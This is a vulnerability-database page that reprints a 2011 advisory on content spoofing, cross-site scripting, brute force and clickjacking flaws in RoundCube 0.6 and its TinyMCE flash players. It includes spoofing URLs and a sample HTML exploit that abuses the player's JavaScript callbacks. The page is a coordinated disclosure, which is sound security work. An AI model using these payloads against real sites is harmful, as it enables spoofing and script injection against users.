Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RoundCube 0.6 Content Spoofing / Cross Site Scripting

🗓️ 01 Dec 2011 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

RoundCube 0.6 Content Spoofing and XSS vulnerabilities. Clickjacking risk highlighted

Code
`Hello list!  
  
I want to warn you about multiple vulnerabilities in RoundCube.  
  
These are Brute Force, Content Spoofing, Cross-Site Scripting and  
Clickjacking vulnerabilities. CS and XSS are in TinyMCE, which is included  
with RoundCube.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are RoundCube 0.6 and previous versions (checked in 0.4-beta and  
0.6). In last version RoundCube 0.6 uses moxieplayer.swf (instead of  
flv_player.swf).  
  
As the developers informed me, these vulnerabilities will be fixed in  
version RoundCube 0.7.  
  
----------  
Details:  
----------  
  
Brute Force (WASC-11):  
  
http://site/index.php  
  
Content Spoofing (WASC-12):  
  
Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay and  
startImage, which allows to spoof content of flash - i.e. by setting  
addresses of video and/or image files from other site.  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg  
  
Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay,  
which allows to spoof content of flash - i.e. by setting address of playlist  
file from other site (parameters thumbnail and url in xml-file accept  
arbitrary addresses).  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<playlist>  
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>  
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>  
</playlist>  
  
XSS (WASC-08):  
  
If at the site at page with flv_player.swf (with parameter jsCallback=true,  
or if there is possibility to set this parameter for flv_player.swf) there  
is possibility to include JS code with function flvStart() and/or flvEnd()  
(via HTML Injection), then it's possible to conduct XSS attack. I.e.  
JS-callbacks can be used for XSS attack.  
  
Example of exploit:  
  
<html>  
<body>  
<script>  
function flvStart() {  
alert('XSS');  
}  
function flvEnd() {  
alert('XSS');  
}  
</script>  
<object width="50%" height="50%">  
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">  
<param name=quality value=high>  
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"  
height="50%" quality=high  
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"  
type="application/x-shockwave-flash"></embed>  
</object>  
</body>  
</html>  
  
Content Spoofing (WASC-12):  
  
http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=1.flv  
  
This swf-file accepts arbitrary addresses in parameter url, which allows to  
spoof content of flash - i.e. by setting address of video file from other  
site.  
  
Clickjacking:  
  
RoundCube is vulnerable to remote login with using of Clickjacking  
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008090.html).  
About such attacks I've wrote already in my article.  
  
In version RoundCube 0.6-RC there was added protection against Clickjacking  
attack (except above-mentioned login form), to which all functionality of  
the application is vulnerable. But the method is not effective enough,  
because it works only in new versions of some browsers, so all users of  
older browsers are unprotected. And old versions of RoundCube are fully  
vulnerable to Clickjacking.  
  
------------  
Timeline:  
------------  
  
2011.10.15 - found vulnerabilities.  
2011.10.18 - announced at my site.  
2011.10.21 - informed developer of RoundCube. During my conversation with  
developer during October-November, he decided to fix them and was working on  
fixes for these holes.  
2011.11.23 - developer of RoundCube informed that all fixes have been made  
and would be added to the next release RoundCube 0.7.  
2011.11.30 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site:  
http://websecurity.com.ua/5448/  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Dec 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
roundcubevulnerabilitiescontent spoofingcross-site scriptingbrute forcetinymceclickjacking
24